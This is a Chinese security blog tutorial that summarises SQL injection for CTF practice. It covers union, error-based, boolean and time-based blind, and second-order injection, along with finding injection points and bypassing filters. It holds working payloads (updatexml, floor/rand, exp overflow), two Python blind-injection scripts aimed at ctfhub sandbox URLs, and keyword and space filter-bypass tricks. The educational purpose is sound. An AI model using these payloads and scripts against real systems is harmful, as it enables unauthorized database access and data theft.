<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="sql注入">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>漏洞大总结1-SQL注入 | Ex1t</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ex1t</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ex1t</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/1.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">漏洞大总结1-SQL注入</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                                <span class="chip bg-color">漏洞</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-07-30
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.5k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    14 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p><img src="http://img.ex1t.xyz/20201230173056.jpg"></p>
<h1 id="漏洞大总结1-SQL注入——-诚默"><a href="#漏洞大总结1-SQL注入——-诚默" class="headerlink" title="漏洞大总结1-SQL注入—— 诚默"></a>漏洞大总结1-SQL注入—— 诚默</h1><blockquote>
<p>攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作,这个就是SQL注入。</p>
</blockquote>
<h3 id="1、什么是注入"><a href="#1、什么是注入" class="headerlink" title="1、什么是注入"></a>1、什么是注入</h3><h4 id="1-1-首先要了解注入的原理"><a href="#1-1-首先要了解注入的原理" class="headerlink" title="1.1 首先要了解注入的原理"></a>1.1 首先要了解注入的原理</h4><p>就比如前端查询用户id得到用户的数据<br>        id=传入的值<br>后台定义的语句如下</p>
<pre><code>    `date=select * from  user where id=传入的值`
    `return date`</code></pre>
<p>原本正常用户输入的值应当是1、2、3<br>但是恶意用户可以输入<code> -1 or 1=1</code>  获得全部的用户数据<br>或输入 -1 union select user()   通过联合查询获取当前用户</p>
<h4 id="1-2-分类"><a href="#1-2-分类" class="headerlink" title="1.2 分类"></a>1.2 分类</h4><ol>
<li>有回显的注入<ul>
<li>联合注入<ul>
<li>整数注入</li>
<li>字符注入</li>
<li>搜索注入</li>
</ul>
</li>
<li>报错注入</li>
</ul>
</li>
<li>没有回显的注入<ul>
<li>布尔注入</li>
<li>时间盲注</li>
</ul>
</li>
<li>二次注入</li>
</ol>
<p>所以仔细分下来<strong>联合注入（整数、字符、搜索）、报错注入、布尔注入、时间盲注、二次注入</strong></p>
<h4 id="1-3-漏洞利用"><a href="#1-3-漏洞利用" class="headerlink" title="1.3 漏洞利用"></a>1.3 漏洞利用</h4><h5 id="1-3-1-联合注入"><a href="#1-3-1-联合注入" class="headerlink" title="1.3.1 联合注入"></a>1.3.1 联合注入</h5><p>使用联合注入的场景一般为数据库查询的数据会回显到页面<br>其中分为整数注入、字符注入、搜索注入<br>分为这几种也是获取的数据类型或功能不同，<br>后台代码大致如下</p>
<ul>
<li><p>整数注入后台代码<br><code>date=select * from  user where id=前台传输的数据</code></p>
</li>
<li><p>字符注入后台代码<br><code>date=select * from  user where id='前台传输的数据'</code></p>
</li>
<li><p>搜索注入<br><code>date=select * from user  where name like '%前台传输的数据%'</code></p>
</li>
</ul>
<p>所以要查询当前用户，需要使用不同的数据<br>由于后台得到的数据会进行字符化处理，我们使用单引号来引起提前闭合，所以需要使用注释符（#或–）来注释最后一个单引号。<br>注意的是，注释符后面还需要加个空格。</p>
<ul>
<li><p>整数注入：id=-1 union select user()</p>
<p>  <code>date=select * from  user where id=-1 union select user()</code></p>
</li>
<li><p>字符注入：id=-1’ union select user() – </p>
<p>  <code>date=select * from  user where id='-1' union select user() -- '</code></p>
</li>
<li><p>搜索注入：name=%’ union select user() – </p>
<p>  <code>date=select * from user  where name like '%%' union select user() -- %'</code></p>
</li>
</ul>
<p>获取所有数据</p>
<ul>
<li><p>整数注入：id=1 or 1=1</p>
<p>  <code>date=select * from  user where id=-1 or 1=1</code></p>
</li>
<li><p>字符注入：id=’ or ‘1’=’1</p>
<p>  <code>date=select * from  user where id='' or '1'='1'</code></p>
</li>
<li><p>搜索注入：name=%‘ or ‘%’=’</p>
<p>  <code>date=select * from  user where id='%%' or '%'='%'</code></p>
</li>
</ul>
<p>对联合注入先就说到这里</p>
<h5 id="1-3-2-报错注入"><a href="#1-3-2-报错注入" class="headerlink" title="1.3.2 报错注入"></a>1.3.2 报错注入</h5><blockquote>
<p>报错注入分为<strong>updatexml</strong>、<strong>floor</strong>和<strong>exp</strong></p>
</blockquote>
<h6 id="平时用的最多的是updatexml"><a href="#平时用的最多的是updatexml" class="headerlink" title="平时用的最多的是updatexml"></a>平时用的最多的是<strong>updatexml</strong></h6><p><code>UPDATEXML (XML_document, XPath_string, new_value);</code></p>
<ol>
<li>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</li>
<li>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。</li>
<li>第三个参数：new_value，String格式，替换查找到的符合条件的数据</li>
</ol>
<p><strong>作用：</strong> 改变文档中符合条件的节点的值　<br>concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出用户<br>0x7e ASCII码,实为~,upadtexml()报错信息为特殊字符、字母及之后的内容,为了前面字母丢失,开头连接一个特殊字符~ </p>
<p><strong>eg:</strong></p>
<ul>
<li>concat(‘m’,’y’)=my</li>
<li>concat中的sql语句可以被执行</li>
<li>concat执行sql注入语句，再利用updatexml的报错信息返回sql语句执行结果</li>
<li>updatexml第二个参数必须是字符串吧，所以才需要借助返回值为字符串的concat函数。</li>
<li>1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));<pre><code>  查询当前用户</code></pre>
</li>
</ul>
<h6 id="再说floor"><a href="#再说floor" class="headerlink" title="再说floor"></a>再说floor</h6><p>报错的原理是<strong>rand</strong>和<strong>ordery by</strong>或<strong>group by</strong>的冲突<br><code>select count(*) from test group by floor(rand(0)*2);</code><br>因为 rand 函数的特殊性（如果使用rand()的话，该值会被计算多次）<br>group by 进行分组时，<strong>floor(rand(0)*2)**执行一次（查看分组是否存在），如果虚拟表中不存在该分组，那么在插入新分组的时候 **floor(rand(0)*2)</strong> 就又计算了一次。（其实在上述 rand(0) 产生多个数据的时候，也能观察出来。只要 rand(0) 被调用，一定会产生新值）。<br>rand是伪随机。<br>所以*<em>floor(rand(0)<em>2)</em></em>值依此是011011001<br>当 group by 对其进行分组的时候，首先遇到第一个值 0 ，发现 0 不存在，于是需要插入分组，就在这时，*<em>floor(rand(0)<em>2)</em></em>再次被触发，生成第二个值 1 ，因此最终插入虚拟表的也就是第二个值 1 ；然后遇到第三个值 1 ，因为已经存在分组 1 了，就直接计数加1（这时1的计数变为2）;遇到第四个值 0 的时候，发现 0 不存在，于是又需要插入新分组，然后floor(rand(0)*2)又被触发，生成第五个值 1 ，因此这时还是往虚拟表里插入分组 1 ，但是，分组 1 已经存在了！所以报错</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">?id=1'+
and(
    select 1 from (select count(*),concat((select ( 
        select (select concat(0x7e,version(),0x7e
                                                    )
                                            ))
                                            from infomatioon_shcema.tables limt 0,1
                    )
floor(rand(0)*2)) x from information_schema.tables group by x)a)%23 <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>%23是注释符#的url编码</p>
<h6 id="exp函数报错"><a href="#exp函数报错" class="headerlink" title="exp函数报错"></a>exp函数报错</h6><p>本质是溢出报错<br>exp是以e为底的指数函数，<br>但是，由于数字太大是会产生溢出。这个函数会在参数大于709时溢出，报错。<br>~是取反符<br>我们通过子查询与按位求反，造成一个DOUBLE overflow error，并借由此注出数据。<br><code>?id=1' and exp(~(  select * from (select user()   )x))%23</code></p>
<h5 id="1-3-3-布尔注入"><a href="#1-3-3-布尔注入" class="headerlink" title="1.3.3 布尔注入"></a>1.3.3 布尔注入</h5><p>由于开发者将报错信息屏蔽导致，但是网页对于真假有不同的回显<br>只显示你当前的条件是否正确或者错误，例如我们判断字段数 order by 2返回正确，order by 3返回错误<br>一般经常使用的函数有以下几种分类</p>
<ol>
<li>截取函数</li>
</ol>
<ul>
<li>substr()</li>
<li>left()</li>
<li>right()</li>
</ul>
<ol start="2">
<li>转换函数</li>
</ol>
<ul>
<li>ascii（）将字符串转换为ascii码</li>
<li>hex（）将字符串的值转换为16进制的值</li>
<li>面对布尔盲注，我们想要获取自己想知道的信息时，需要判断信息的每一位的ASCII码，对于返回的信息是否正确，直接观察页面的返回正常与否即可,虽然可以手动判断，但是花费时间过长，但是我使用常规的盲注脚本发现没有出现正常结果。<br>到<code>and 1=1</code>和<code>and 1=2</code>返回的都是success，所以我们使用<code>if(expr1,expr2,expr3)</code>函数来盲注<br>具体脚本</li>
</ul>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
url<span class="token operator">=</span><span class="token string">'http://challenge-b4f28550822194be.sandbox.ctfhub.com:10080/?id='</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment">#0-3,假设四条记录，第i条开始</span>
    name<span class="token operator">=</span><span class="token string">''</span>
    <span class="token keyword">for</span> j <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">10</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">for</span> k <span class="token keyword">in</span> <span class="token string">'0123456789zaqwsxedcrfvtgbyhnujmikolp_'</span><span class="token punctuation">:</span><span class="token comment">#判断字符</span>
            test_url<span class="token operator">=</span>url<span class="token operator">+</span>
             '<span class="token keyword">if</span>
    <span class="token punctuation">(</span>substr<span class="token punctuation">(</span><span class="token punctuation">(</span>select table_name <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span>tables where table_schema<span class="token operator">=</span>database<span class="token punctuation">(</span><span class="token punctuation">)</span> limit <span class="token operator">%</span>d<span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token operator">%</span>d<span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span>
    <span class="token operator">=</span><span class="token string">"%s"</span><span class="token punctuation">,</span>
    <span class="token number">1</span><span class="token punctuation">,</span><span class="token punctuation">(</span>select table_name <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span>tables<span class="token punctuation">)</span>
    <span class="token punctuation">)</span>'
    <span class="token operator">%</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span>j<span class="token punctuation">,</span>k<span class="token punctuation">)</span>  <span class="token comment">#分别是第i条记录，第j个字符，k字符</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>test_url<span class="token punctuation">)</span>
    rep<span class="token operator">=</span>requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>test_url<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token string">'query_success'</span> <span class="token keyword">in</span> rep<span class="token punctuation">.</span>text<span class="token punctuation">:</span>
        name<span class="token operator">=</span>name<span class="token operator">+</span>k
        <span class="token keyword">break</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到表名</p>
<h5 id="1-3-4-时间盲注"><a href="#1-3-4-时间盲注" class="headerlink" title="1.3.4 时间盲注"></a>1.3.4 时间盲注</h5><p>在<code>?id=1</code> 后面添加 <code>and sleep(10)</code><br>这个延迟时间测试是否有时间盲注的时候设长一点，因为是手动测试是否有漏洞，为了避免网络的原因让我们漏掉漏洞，sleep(10)之后可以看到网站有明显的延迟，证明时间盲注存在<br>时间盲注会用到<code>sleep(time)</code>函数，还有if函数<br><code>if(1,2,3)</code>：如果1真，则执行2，否则执行3<br><code>Sleep(x)</code>：执行延迟x秒<br>先判断数据库的长度和数据库名称<br>具体脚本</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requests
<span class="token keyword">import</span> time
<span class="token keyword">import</span> string
<span class="token keyword">import</span> sys
headers <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">"user-agent"</span><span class="token punctuation">:</span><span class="token string">"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"</span><span class="token punctuation">}</span>
chars <span class="token operator">=</span> <span class="token string">'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'</span>
database <span class="token operator">=</span> <span class="token string">''</span>
<span class="token keyword">global</span> length
<span class="token keyword">for</span> l <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token number">20</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
      lengthUrl <span class="token operator">=</span> 'http<span class="token punctuation">:</span><span class="token operator">//</span>challenge<span class="token operator">-</span>c13b65fc664e2e69<span class="token punctuation">.</span>sandbox<span class="token punctuation">.</span>ctfhub<span class="token punctuation">.</span>com<span class="token punctuation">:</span><span class="token number">10080</span><span class="token operator">/</span>?
       <span class="token operator">+</span><span class="token string">'id=1 and if(length(database())&gt;{0},1,sleep(3))--+'</span>
       lengthUrlFormat <span class="token operator">=</span> lengthUrl<span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>l<span class="token punctuation">)</span>  <span class="token comment">#判断数据长度</span>
      start_time0 <span class="token operator">=</span> time<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token comment">#获取时间    </span>
       rsp0 <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>lengthUrlFormat<span class="token punctuation">,</span>headers<span class="token operator">=</span>headers<span class="token punctuation">)</span>
    <span class="token keyword">if</span>  time<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">-</span> start_time0 <span class="token operator">&gt;</span> <span class="token number">2.5</span><span class="token punctuation">:</span>
              <span class="token keyword">print</span> <span class="token string">'database length is '</span> <span class="token operator">+</span> <span class="token builtin">str</span><span class="token punctuation">(</span>l<span class="token punctuation">)</span>
            <span class="token keyword">global</span> length
               length <span class="token operator">=</span> l
               <span class="token keyword">break</span>
       <span class="token keyword">else</span><span class="token punctuation">:</span>
           <span class="token keyword">pass</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span>length<span class="token operator">+</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token comment">#根据长度来弄出名</span>
      <span class="token keyword">for</span> char <span class="token keyword">in</span> chars<span class="token punctuation">:</span> <span class="token comment">#chars是所有字符 anbcd...</span>
          charAscii <span class="token operator">=</span> <span class="token builtin">ord</span><span class="token punctuation">(</span>char<span class="token punctuation">)</span>  <span class="token comment">#全部大写</span>
          url <span class="token operator">=</span> 'http<span class="token punctuation">:</span><span class="token operator">//</span>challenge<span class="token operator">-</span>c13b65fc664e2e69<span class="token punctuation">.</span>sandbox<span class="token punctuation">.</span>ctfhub<span class="token punctuation">.</span>com<span class="token punctuation">:</span><span class="token number">10080</span><span class="token operator">/</span>?<span class="token builtin">id</span><span class="token operator">=</span><span class="token number">1</span> 
           <span class="token operator">+</span><span class="token string">'and if(ascii(substr(database(),{0},1))&gt;{1},1,sleep(3))--+'</span>
          urlformat <span class="token operator">=</span> url<span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span>charAscii<span class="token punctuation">)</span> <span class="token comment">#名的第i个字符，与某个字符比较</span>
           start_time <span class="token operator">=</span> time<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token punctuation">)</span>
        rsp <span class="token operator">=</span> requests<span class="token punctuation">.</span>get<span class="token punctuation">(</span>urlformat<span class="token punctuation">,</span>headers<span class="token operator">=</span>headers<span class="token punctuation">)</span><span class="token comment">#访问</span>
         <span class="token keyword">if</span>  time<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">-</span> start_time <span class="token operator">&gt;</span> <span class="token number">2.5</span><span class="token punctuation">:</span>
               database<span class="token operator">+=</span>char
              <span class="token keyword">print</span> <span class="token string">'database: '</span><span class="token punctuation">,</span>database
               <span class="token keyword">break</span>
           <span class="token keyword">else</span><span class="token punctuation">:</span>
              <span class="token keyword">pass</span>
<span class="token keyword">print</span> <span class="token string">'database is '</span> <span class="token operator">+</span> database<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h5 id="1-3-5-二次注入"><a href="#1-3-5-二次注入" class="headerlink" title="1.3.5 二次注入"></a>1.3.5 二次注入</h5><p>二次注入是因为数据在第一次进入数据库的时候进行了过滤和转义<br>当这条数据从数据取出来在sql语句中进行拼接，而这次拼接中没有过滤<br>一般比较难发现，所以比赛中很难发现，一般CTF出题人会给源码，或者提示<br>二次注入也一般不是单纯的二次注入，通常还有报错注入或bool盲注，要写脚本模拟</p>
<h4 id="2、找到漏洞"><a href="#2、找到漏洞" class="headerlink" title="2、找到漏洞"></a>2、找到漏洞</h4><p>再谈一谈怎么发现注入点<br>常见的注入点位置有</p>
<ol>
<li><p>GET参数的注入</p>
<p> 这个最容易发现，就是参数在url中，如<a target="_blank" rel="noopener" href="http://www.ex1t.com/?id=1">www.ex1t.com?id=1</a></p>
</li>
<li><p>POST参数的注入</p>
<p> 这个需要通过抓包，使用burp或者浏览器插件hackbar等</p>
</li>
<li><p>User-Agent的注入</p>
<p> 使用Burp的Repeater模块（重发器）当然，以上都可以使用sqlmap来测试。<br> 一般注入点都发生在常进行数据变动的地方，比如进行数据查询</p>
</li>
</ol>
<p>然后再判断是否有注入</p>
<p>1.输入单引号</p>
<pre><code>最常见检测，让sql语句产生单引号未闭合错误</code></pre>
<ol start="2">
<li><p>注入类型判断</p>
<p> and 1=1(数字型) 和 ‘and ‘1’=’1(字符串)和 %’ and ‘%’=’(搜索型)进行判断</p>
</li>
<li><p>通过数字加减来判断是不是整数型</p>
<p>id=3-1结果和id=2结果是否一样。<br>日常中常用的还是单引号，and，or</p>
</li>
</ol>
<h4 id="3、绕过过滤"><a href="#3、绕过过滤" class="headerlink" title="3、绕过过滤"></a>3、绕过过滤</h4><p>通常会有以下方式防Sql注入</p>
<h5 id="3-1-过滤关键词"><a href="#3-1-过滤关键词" class="headerlink" title="3.1 过滤关键词"></a>3.1 过滤关键词</h5><h6 id="3-1-1-过滤select、or、from等关键字"><a href="#3-1-1-过滤select、or、from等关键字" class="headerlink" title="3.1.1 过滤select、or、from等关键字"></a>3.1.1 过滤select、or、from等关键字</h6><p>有些题目是将关键词替换为空，这时候能使用穿插关键字方法绕过<br>那可以通过双写，大小写绕过</p>
<ol>
<li>双写</li>
</ol>
<ul>
<li>selselectect –&gt; select</li>
<li>oorr –&gt; or</li>
</ul>
<ol start="2">
<li>大小写</li>
</ol>
<ul>
<li>SeLect</li>
<li>Or</li>
</ul>
<h6 id="3-1-2-如果只是过滤了or-and-xor-not等等"><a href="#3-1-2-如果只是过滤了or-and-xor-not等等" class="headerlink" title="3.1.2 如果只是过滤了or and xor not等等"></a>3.1.2 如果只是过滤了or and xor not等等</h6><ul>
<li>and = &amp;&amp;</li>
<li>or = ||</li>
<li>xor = | # 异或</li>
<li>not = !</li>
</ul>
<h6 id="3-1-3-有时候过滤函数是通过十六进制进行过滤。"><a href="#3-1-3-有时候过滤函数是通过十六进制进行过滤。" class="headerlink" title="3.1.3 有时候过滤函数是通过十六进制进行过滤。"></a>3.1.3 有时候过滤函数是通过十六进制进行过滤。</h6><p>可以对关键字的个别字符进行替换</p>
<pre><code>    select --&amp;gt; selec\x74</code></pre>
<p>有时候通过双重URL编码进行绕过操作</p>
<pre><code>    %25%36%66%25%37%32 --&amp;gt; %6f%72 --&amp;gt; or</code></pre>
<p>还有内联注释绕过<br>内联注释就是把一些特有的仅在MYSQL上的语句放在 /<em>!…</em>/ 中，这样这些语句如果在其它数据库中是不会被执行，但在MYSQL中会执行。<br><code>mysql&amp;gt; select * from users where id = -1 union /*!select*/ 1,2,3;</code></p>
<h5 id="3-2-过滤空格"><a href="#3-2-过滤空格" class="headerlink" title="3.2 过滤空格"></a>3.2 过滤空格</h5><h6 id="3-2-1-通过注释绕过，一般的注释符有如下几个"><a href="#3-2-1-通过注释绕过，一般的注释符有如下几个" class="headerlink" title="3.2.1 通过注释绕过，一般的注释符有如下几个"></a>3.2.1 通过注释绕过，一般的注释符有如下几个</h6><ul>
<li>#</li>
<li>--<br>//</li>
<li>/**/</li>
<li>;%00</li>
</ul>
<p>可以通过注释符来绕过空格</p>
<pre class="line-numbers language-none"><code class="language-none">select/**/name/**/from/**/user<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h6 id="3-2-2-通过URL编码绕过，我们知道空格-20，所以可以通过二次URL编码进行绕过"><a href="#3-2-2-通过URL编码绕过，我们知道空格-20，所以可以通过二次URL编码进行绕过" class="headerlink" title="3.2.2 通过URL编码绕过，我们知道空格%20，所以可以通过二次URL编码进行绕过"></a>3.2.2 通过URL编码绕过，我们知道空格%20，所以可以通过二次URL编码进行绕过</h6><pre class="line-numbers language-none"><code class="language-none">%20 --&gt; %2520<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
